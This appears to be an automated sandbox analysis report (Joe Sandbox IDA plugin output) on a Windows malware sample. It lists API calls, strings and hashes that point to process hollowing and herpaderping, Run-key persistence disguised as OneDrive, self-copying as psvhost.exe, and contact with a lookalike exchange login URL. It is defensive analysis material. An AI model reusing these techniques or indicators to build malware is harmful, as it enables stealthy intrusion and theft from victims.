CreateDirectoryA.KERNEL32 ref: 00007FF68A1879A9
GetLastError.KERNEL32 ref: 00007FF68A1879B3
GetModuleFileNameA.KERNEL32 ref: 00007FF68A1879CC
lstrcatA.KERNEL32 ref: 00007FF68A1879DE
lstrcatA.KERNEL32 ref: 00007FF68A1879EE
lstrcatA.KERNEL32 ref: 00007FF68A187A00
SetFileAttributesA.KERNEL32 ref: 00007FF68A187A10
CopyFileA.KERNEL32 ref: 00007FF68A187A22

Strings

.exe, xrefs: 00007FF68A1879F4

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: lstrcat$File$Directory$AttributesCopyCreateErrorFolderInformationLastModuleNamePathVolumeWindowswsprintf
String ID: .exe
API String ID: 3525706726-4119554291
Opcode ID: 22d15947ae3bae42f231afd136f066c34fb2ee88ca39dd14ed79a9b50fbaaefc
Instruction ID: e7e4368f9036ac681343881c1a62c1d338425734816017f395c536f6d0eaaf22
Opcode Fuzzy Hash: 22d15947ae3bae42f231afd136f066c34fb2ee88ca39dd14ed79a9b50fbaaefc
Instruction Fuzzy Hash: 3B41A732619B46E1EB108F25E4403AEBB66FF94784F845179DA9E839A8DF3CE14DC700

Function 00007FF68A187A94 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 92
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlW.WININET ref: 00007FF68A187AE0
InternetOpenUrlW.WININET ref: 00007FF68A187B07
InternetCloseHandle.WININET ref: 00007FF68A187B18
CreateFileW.KERNEL32 ref: 00007FF68A187B49
InternetCloseHandle.WININET ref: 00007FF68A187B5B
WriteFile.KERNEL32 ref: 00007FF68A187B87
InternetReadFile.WININET ref: 00007FF68A187BAE
CloseHandle.KERNEL32 ref: 00007FF68A187BBF
InternetCloseHandle.WININET ref: 00007FF68A187BC8
InternetCloseHandle.WININET ref: 00007FF68A187BD1

Strings

https://exchanger.ink/event.php, xrefs: 00007FF68A187AF3
https://auth.xn--conbase-sfb.xyz/event.php, xrefs: 00007FF68A187AC7

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Internet$CloseHandle$File$Open$CreateReadWrite
String ID: https://auth.xn--conbase-sfb.xyz/event.php$https://exchanger.ink/event.php
API String ID: 769820311-1523628693
Opcode ID: bcf234d6e8469795b09c9773892b9828d64290e906b07b609975a1d29e9d043d
Instruction ID: 23a6bc9445dbca7f33c49f2ae299eec7fc5464612ca2c640833ae9fc1608e939
Opcode Fuzzy Hash: bcf234d6e8469795b09c9773892b9828d64290e906b07b609975a1d29e9d043d
Instruction Fuzzy Hash: 45417321A1A646D2FB608B21A51577A7B62FF48BD8F000179DEDD46F95EF7CE409CB00

Function 00007FF68A187F1C Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 241
fileregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32 ref: 00007FF68A187FC4
CopyFileW.KERNEL32 ref: 00007FF68A1881B2
RegOpenKeyExW.KERNEL32 ref: 00007FF68A18824C
SetFileAttributesW.KERNEL32 ref: 00007FF68A1882B4
FindNextFileW.KERNELBASE ref: 00007FF68A1882D8
FindClose.KERNEL32 ref: 00007FF68A1882E9

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF68A18823E
\Service_, xrefs: 00007FF68A1880CC
.exe, xrefs: 00007FF68A1880F4

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: File$Find$AttributesCloseCopyFirstNextOpen
String ID: .exe$Software\Microsoft\Windows\CurrentVersion\Run$\Service_
API String ID: 1925689219-4233635908
Opcode ID: 3b435baa05f6d8803ba0415212f736da15b78584862174ec23049d42598ee05d
Instruction ID: 6857cf92d9ae4f9c78b8629086ce399a8bb8025f95ead5779406c29c249cc18d
Opcode Fuzzy Hash: 3b435baa05f6d8803ba0415212f736da15b78584862174ec23049d42598ee05d
Instruction Fuzzy Hash: C7B1C022A5AB92E5EB20DF60D8401EC3B75FF40798F404179EE9D97AA9DF38E494C340

Function 00007FF68A182DBC Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68A1829C8: GetModuleFileNameW.KERNEL32 ref: 00007FF68A1829F7

GetModuleFileNameW.KERNEL32 ref: 00007FF68A182DF8
RegOpenKeyExW.ADVAPI32 ref: 00007FF68A182E1F
SHGetFolderPathW.SHELL32 ref: 00007FF68A182E57

Part of subcall function 00007FF68A182AD0: RegSetValueExW.KERNEL32 ref: 00007FF68A182B08
Part of subcall function 00007FF68A182AD0: RegCloseKey.ADVAPI32 ref: 00007FF68A182B18

GetModuleFileNameW.KERNEL32 ref: 00007FF68A182E85
RegOpenKeyExW.ADVAPI32 ref: 00007FF68A182EAC
SHGetFolderPathW.SHELL32 ref: 00007FF68A182EE4

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF68A182E03, 00007FF68A182E90
OneDrive, xrefs: 00007FF68A182E2E
WpnUserService, xrefs: 00007FF68A182EBB

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: FileModuleName$FolderOpenPath$CloseValue
String ID: OneDrive$Software\Microsoft\Windows\CurrentVersion\Run$WpnUserService
API String ID: 2892408737-3975739113
Opcode ID: e45bb9ae70fb6b9d345573ff3fa9ad46ef1455935eccfa489949dc55301faabc
Instruction ID: b0eb04463cdfadf146c09bfec35879bb3007b2329f913df69deb420411e5be02
Opcode Fuzzy Hash: e45bb9ae70fb6b9d345573ff3fa9ad46ef1455935eccfa489949dc55301faabc
Instruction Fuzzy Hash: B841D932719A87E1EB60DF20E8417EA2764FF45349F801079DA9D97598EF3DE209C700

Function 00007FF68A183614 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146
processlibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsnlen.LIBCMT ref: 00007FF68A1836A6
GetModuleHandleA.KERNEL32 ref: 00007FF68A1836CE
GetProcAddress.KERNEL32 ref: 00007FF68A1836DE
CreateProcessInternalW.KERNEL32 ref: 00007FF68A183766
NtMapViewOfSection.NTDLL ref: 00007FF68A1837B1

Part of subcall function 00007FF68A1814E8: Wow64GetThreadContext.KERNEL32 ref: 00007FF68A18154D
Part of subcall function 00007FF68A1814E8: Wow64SetThreadContext.KERNEL32 ref: 00007FF68A181567

ResumeThread.KERNEL32 ref: 00007FF68A18381F

Strings

CreateProcessInternalW, xrefs: 00007FF68A1836D4
kernel32, xrefs: 00007FF68A1836AF

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Thread$ContextWow64$AddressCreateHandleInternalModuleProcProcessResumeSectionViewwcsnlen
String ID: CreateProcessInternalW$kernel32
API String ID: 1125945598-4069603262
Opcode ID: 8100aae60a3a38117a167ad8c34844d310698dd5fc654ce53c76c7e31ad9ee12
Instruction ID: cfdb32bc4af574d6681258e8d6f18e50224b5dfb2f1c739a8ed32fb07aff76fa
Opcode Fuzzy Hash: 8100aae60a3a38117a167ad8c34844d310698dd5fc654ce53c76c7e31ad9ee12
Instruction Fuzzy Hash: 6B51B232A0AB41E6EB50CF24E4406AA7BA4FF88794F544239DE9D83794DF3CD155CB00

Function 00007FF68A18878C Relevance: 12.1, APIs: 8, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF68A1887A1
OpenProcessToken.ADVAPI32 ref: 00007FF68A1887B4
GetTokenInformation.KERNELBASE ref: 00007FF68A1887E0
malloc.LIBCMT ref: 00007FF68A1887EA

Part of subcall function 00007FF68A18CA08: _FF_MSGBANNER.LIBCMT ref: 00007FF68A18CA38
Part of subcall function 00007FF68A18CA08: _NMSG_WRITE.LIBCMT ref: 00007FF68A18CA42
Part of subcall function 00007FF68A18CA08: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF68A18F770,?,?,?,00007FF68A193E30,?,?,?,00007FF68A193D2F,?,?,00000000,00007FF68A19206E), ref: 00007FF68A18CA5D
Part of subcall function 00007FF68A18CA08: _callnewh.LIBCMT ref: 00007FF68A18CA76
Part of subcall function 00007FF68A18CA08: _errno.LIBCMT ref: 00007FF68A18CA81
Part of subcall function 00007FF68A18CA08: _errno.LIBCMT ref: 00007FF68A18CA8C

GetTokenInformation.KERNELBASE ref: 00007FF68A18880E
AdjustTokenPrivileges.KERNELBASE ref: 00007FF68A18884C
FindCloseChangeNotification.KERNEL32 ref: 00007FF68A188857
free.LIBCMT ref: 00007FF68A188860

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: Token$InformationProcess_errno$AdjustAllocateChangeCloseCurrentFindHeapNotificationOpenPrivileges_callnewhfreemalloc
String ID:
API String ID: 1402168008-0
Opcode ID: 7ce135d074d5de56d802d4dee4aad95d01fe18e0a52ed59db4a7ac59e77ae686
Instruction ID: bac463430276feef8e06bb198dc508b3d7cf8343fc4c0b3c8fa84c639cc70f62
Opcode Fuzzy Hash: 7ce135d074d5de56d802d4dee4aad95d01fe18e0a52ed59db4a7ac59e77ae686
Instruction Fuzzy Hash: 1A216D36A2AA42D2EB508B11E41476A7B61FF85B85F401179EEDF97B58DF3CE044CB00

Function 00007FF68A187C00 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 216
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF68A187D2A
CoInitialize.OLE32 ref: 00007FF68A187DFF
CoCreateInstance.OLE32 ref: 00007FF68A187E21
CoUninitialize.OLE32 ref: 00007FF68A187E9D

Strings

WinServer, xrefs: 00007FF68A187E4C
.lnk, xrefs: 00007FF68A187DAD

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: CreateFolderInitializeInstancePathUninitialize
String ID: .lnk$WinServer
API String ID: 760132150-1496378126
Opcode ID: 67a85fbf69f2377e88e1748d9c978f625df547cbd3f940e233c79c74179f9b8d
Instruction ID: d52c51cd6a0ef960075bc8bb1034c4cf4571fb2f6d22478d53efd3c1aafe0f25
Opcode Fuzzy Hash: 67a85fbf69f2377e88e1748d9c978f625df547cbd3f940e233c79c74179f9b8d
Instruction Fuzzy Hash: F8A17A22B5AB42E6EB10CF65D8541AC3771FF44B88B401179CE9DA3BA8DF38E559C380

Function 00007FF68A183574 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 00007FF68A1835B7
NtClose.NTDLL ref: 00007FF68A1835E5

Strings

herpaderping, xrefs: 00007FF68A1835C7

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: CloseCreateSection
String ID: herpaderping
API String ID: 3832541453-3390404583
Opcode ID: dc1176962a1a86c629cb42389b2f8d6b38a9cc3a70b5af4755ec92ecf4cc9c5e
Instruction ID: fa913ea6766ab6620b3d0dcfabf86ced54e50672333e88e153c7124b359f2cc4
Opcode Fuzzy Hash: dc1176962a1a86c629cb42389b2f8d6b38a9cc3a70b5af4755ec92ecf4cc9c5e
Instruction Fuzzy Hash: 4101A12271960292EA109B20E85533A7A61FF89BB4F541378EEBE86AD4EF2DD044C600

Function 00007FF68A18B88C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 82
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32 ref: 00007FF68A18B8B9
CloseHandle.KERNEL32 ref: 00007FF68A18B8E9
MapViewOfFile.KERNEL32 ref: 00007FF68A18B909
CloseHandle.KERNEL32 ref: 00007FF68A18B939
GetFileSize.KERNEL32 ref: 00007FF68A18B946
VirtualAlloc.KERNEL32 ref: 00007FF68A18B95D
UnmapViewOfFile.KERNEL32 ref: 00007FF68A18B9A0
CloseHandle.KERNEL32 ref: 00007FF68A18B9A9

Strings

Could not allocate memory in the current process, xrefs: 00007FF68A18B96B
[X] Could not create mapping!, xrefs: 00007FF68A18B8C7
[X] Could not map view of file, xrefs: 00007FF68A18B917

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: File$CloseHandle$View$AllocCreateMappingSizeUnmapVirtual
String ID: Could not allocate memory in the current process$[X] Could not create mapping!$[X] Could not map view of file
API String ID: 1995941692-1760046244
Opcode ID: cce1190e9b3ddd7eccb770f27c10141449ca55bda23d474c8bf9b4b46df8ebd5
Instruction ID: 5239af96161514e7cec1451a5049433927c295f997a488ff4e8e87389a95fd98
Opcode Fuzzy Hash: cce1190e9b3ddd7eccb770f27c10141449ca55bda23d474c8bf9b4b46df8ebd5
Instruction Fuzzy Hash: DD317C21B5A752E1EA04EB12A8543BD6B92BF89FC0F4444B9DD9E97752EE3CF409C300

Function 00007FF68A1889C4 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF68A1889F1
PathFindFileNameW.SHLWAPI ref: 00007FF68A188A03
CreateMutexA.KERNEL32 ref: 00007FF68A188A96
GetLastError.KERNEL32 ref: 00007FF68A188AA4
CloseHandle.KERNEL32 ref: 00007FF68A188AB4
ExitProcess.KERNEL32 ref: 00007FF68A188ABC

Strings

relog.exe, xrefs: 00007FF68A188A26, 00007FF68A188A75
ZBI, xrefs: 00007FF68A188A8A
Unknown, xrefs: 00007FF68A188A0E

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: FileName$CloseCreateErrorExitFindHandleLastModuleMutexPathProcess
String ID: Unknown$ZBI$relog.exe
API String ID: 1305963544-2654455354
Opcode ID: ccb2bcbe5b10f97b93865fe47ac910cf2cde3109da3f9fa5b2e534f4e6bd3a9d
Instruction ID: a13fc73913e0326b42ca7736080c4d3896661383c5c36d20b074b962ff698290
Opcode Fuzzy Hash: ccb2bcbe5b10f97b93865fe47ac910cf2cde3109da3f9fa5b2e534f4e6bd3a9d
Instruction Fuzzy Hash: CB212D60A4EA43F1FA14AB20A8552B96B65BF44794F4805BDDDEED25E6EF3CF508C300

Function 00007FF68A1814E8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 90
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64GetThreadContext.KERNEL32 ref: 00007FF68A18154D
Wow64SetThreadContext.KERNEL32 ref: 00007FF68A181567
GetThreadContext.KERNEL32 ref: 00007FF68A181596
SetThreadContext.KERNEL32 ref: 00007FF68A1815B6
WriteProcessMemory.KERNEL32 ref: 00007FF68A181615

Strings

Failed getting remote PEB address!, xrefs: 00007FF68A1815D3
Cannot update remote EP!, xrefs: 00007FF68A18162C
Cannot update ImageBaseAddress!, xrefs: 00007FF68A18161F

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: ContextThread$Wow64$MemoryProcessWrite
String ID: Cannot update ImageBaseAddress!$Cannot update remote EP!$Failed getting remote PEB address!
API String ID: 4067073250-2699618380
Opcode ID: 150d2d0ff0f6e237eb6ee39db40761c803c5be153981ca0bfed076ff8f0e1f21
Instruction ID: 1a8f98b8fcd9a789d37e64a0d08f4ebb4febafe078999c880604db38b94ef721
Opcode Fuzzy Hash: 150d2d0ff0f6e237eb6ee39db40761c803c5be153981ca0bfed076ff8f0e1f21
Instruction Fuzzy Hash: 7741D763A59682E5EB208F20E8403F86B61BF41798F945279DEAD862C9DF7CE549C700

Function 00007FF68A182C70 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF68A182CCF
wsprintfW.USER32 ref: 00007FF68A182CEB
CoInitialize.OLE32 ref: 00007FF68A182CF3
CoCreateInstance.OLE32 ref: 00007FF68A182D1B
CoUninitialize.OLE32 ref: 00007FF68A182D8E

Strings

%s\%s.lnk, xrefs: 00007FF68A182CDA
OneDrive, xrefs: 00007FF68A182D3B

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: CreateFolderInitializeInstancePathUninitializewsprintf
String ID: %s\%s.lnk$OneDrive
API String ID: 2242482654-657796374
Opcode ID: 4c3bd45f77b36faec18a1d245dbf92288d63d4509f73fc936c5b6cf24f4abd7f
Instruction ID: 7ab7326f9ef063043da0d84bc51806a6dd2458bc3cb79ef57c3ddf7afc9473e3
Opcode Fuzzy Hash: 4c3bd45f77b36faec18a1d245dbf92288d63d4509f73fc936c5b6cf24f4abd7f
Instruction Fuzzy Hash: 9E316B72719B46D2DB108F25E4446A97B61FF88B88F40507ADE9E87B28DF3DE148C700

Function 00007FF68A187718 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF68A187763
GetVolumeInformationA.KERNEL32 ref: 00007FF68A1877AB
wsprintfA.USER32 ref: 00007FF68A187811

Strings

{%08lX%04lX%lu}, xrefs: 00007FF68A187803
:\, xrefs: 00007FF68A18779B
QuBi, xrefs: 00007FF68A1877B5

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: :\$QuBi${%08lX%04lX%lu}
API String ID: 3001812590-3210385017
Opcode ID: 77954543e0ae8c8047d10d44f93f2a9c72b29644aabf7d365a516739bb0ea79a
Instruction ID: 5d814640a816061e32040c0e67ef8c50fb5dceeec2b2b8cb5fa556a437d6fdf1
Opcode Fuzzy Hash: 77954543e0ae8c8047d10d44f93f2a9c72b29644aabf7d365a516739bb0ea79a
Instruction Fuzzy Hash: 5431457260C785DAC314CF79A89115AFFA5FB99340F54517AEAC9C3A28EB3CD208CB00

Function 00007FF68A1831A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wprintf.LIBCMT ref: 00007FF68A1831C7

Part of subcall function 00007FF68A18C3A4: _errno.LIBCMT ref: 00007FF68A18C3C9
Part of subcall function 00007FF68A18C3A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68A18C3D4

GetFileSize.KERNEL32 ref: 00007FF68A1831D4
SetFilePointer.KERNEL32 ref: 00007FF68A1831E8
WriteFile.KERNEL32 ref: 00007FF68A18320B
SetFilePointer.KERNEL32 ref: 00007FF68A18321F

Strings

[+] Overwriting file content, xrefs: 00007FF68A1831C0

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: File$Pointer$SizeWrite_errno_invalid_parameter_noinfowprintf
String ID: [+] Overwriting file content
API String ID: 220120263-1087971816
Opcode ID: c26efce9ec2188fac821274fe5364cb1f70c3828d197fe3d63859887cec324bd
Instruction ID: 8161c59ddacb6f78557aceb90fdcf32474fcccab583af5bc6286351dc0d7a3a2
Opcode Fuzzy Hash: c26efce9ec2188fac821274fe5364cb1f70c3828d197fe3d63859887cec324bd
Instruction Fuzzy Hash: 77018221B29945D1E600CB15F99577ABB62FF84B84F405175EE9E86A24CF2CE409CB00

Function 00007FF68A182B28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75fileCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00007FF68A182BB0
CopyFileW.KERNEL32 ref: 00007FF68A182C1D
wcsncpy.LIBCMT ref: 00007FF68A182C38

Strings

\Microsoft, xrefs: 00007FF68A182B80
\psvhost.exe, xrefs: 00007FF68A182BE4

Memory Dump Source

Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true

Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd

Similarity

API ID: CopyCreateDirectoryFilewcsncpy
String ID: \Microsoft$\psvhost.exe
API String ID: 329375489-403768370
Opcode ID: b936105249ac7b1fcc73de3b8a3057b14c7ac63a973ae248083b24eb71c07c2c
Instruction ID: d735f3d1d84ef9c34ec31ab8975387f82ca0abc20847c61169c969ef32167d6d
Opcode Fuzzy Hash: b936105249ac7b1fcc73de3b8a3057b14c7ac63a973ae248083b24eb71c07c2c
